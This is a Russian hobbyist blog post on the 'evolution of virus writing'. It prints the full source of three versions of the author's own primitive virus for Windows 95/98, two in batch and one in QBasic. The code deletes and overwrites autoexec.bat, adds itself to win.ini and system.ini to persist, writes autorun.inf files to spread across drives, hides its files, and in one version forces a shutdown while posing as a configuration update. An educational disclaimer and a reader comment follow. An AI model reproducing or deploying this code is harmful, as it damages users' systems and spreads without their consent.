Познавательный блог Мобильная врсия

Страницы

Промо

Эволюция вирусописания часть 1

Это первый найденный прототип!

@echo off
copy cs.bat c:/%windir%/system
echo run=c:/%windir%/system/cs.bat >> win.ini
echo run=c:/%windir%/system/cs.bat >> system.ini
echo MY NAME IS cs
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER!!!! > c:\autoexec.bat
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,!! Ваш комппьютер заражен вирусом, а избавиться от
него нельзя, хе-хе-хе"); >> %temp%\mes.js start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls


В этом случае добавилось новых команд, т, к, чего-то плохого сделать я не хотел!!

@echo off
label LOHOLAMMER
copy kas.bat %windir%
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU ARE LAMMER!!!! > c:\autoexec.bat
echo run=%windir%\kas.bat >> %windir%\win.ini
echo run=%windir%\kas.bat >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
ren kas.bat autoexec.bat
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,!! А теперь необходимо перезагрузиться"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
rundll32 krnl386.exe,exitkernel
cls

Примитивный бейсиковый вирус. Вирус написанный на Qbasic. Реликвия!

SCREEN 0
SHELL "echo Программа установки обновляет файлы конфигурации. подождите.."
SHELL "label mp_k"
SHELL "copy mp_k.exe %windir%"
SHELL "if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r"
SHELL "deltree /y c:\autoexec.bat > nul"
SHELL "echo autoexec.bat echo ( [_H@CKED_] ) >> c:\autoexec.bat "
SHELL "echo [windows] >> %windir%\win.ini"
SHELL "echo run = %windir%\mp_k.exe >> %windir%\win.ini"
SHELL "echo [windows] >> %windir%\system.ini"
SHELL "echo run = %windir%\mp_k.exe >> %windir%\system.ini"
SHELL "echo [AutoRun] > c:\autorun.inf"
SHELL "echo open= %windir%\mp_k.exe >> c:\autorun.inf"
SHELL "echo [AutoRun] > d:\autorun.inf"
SHELL "echo open= %windir%\mp_k.exe >> d:\autorun.inf"
SHELL "attrib c:\autoexec.bat"
SHELL "attrib %windir%\mp_k.exe +h +s +a +r"
SHELL "attrib c:\autorun.inf +h +s +a +r"
SHELL "attrib d:\autorun.inf +h +s +a +r"
SHELL "pause"
SHELL "deltree /y mp_k.exe"
SHELL "cls"

Вот и вся эволюция вируса "mp_k" (если это можно назвать вирусом)

Также сделал его скрытым т,е открывающимся и закрывающимся мгновенно и свергнуто!
Убрал приколизм! типа вы заражены соображающий юзер сразу его заметит но не сразу
избавится, вирь ничего страшного не делает, просто портит autoexec.bat..... Работает только под Win 95-98
На ХР не потянет надо дописать так как там и вовсех НТ Autoexec.bat не пашет там файл boot.ini,
Но размножаться может во всех мастдаях!!! :)

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.

Комментарии

Комментарий от Патрон Мозготрона [ 9 марта, 2009, 21:45 ]

Весело! Особенно смена атрибутов +h +s +a +r. В принципе на Вижуал Бейсике я уже писал маленькую программку, которая принудительно изменяет аттрибуты всех файлов в любой указанной папке при обычной работе операционной системы. Экспериментировал на копиях системных файлов — аттрибуты менялись как нечего делать. А вот на оригинальные системные файлы натравливать эту программу не решился. Я ненавижу вирусы, но их так легко писать, что просто страшно становится.

Написать комментарий








Поиск по сайту

Статистика

Мета

  Разработка и дизайн — StvPromo.ru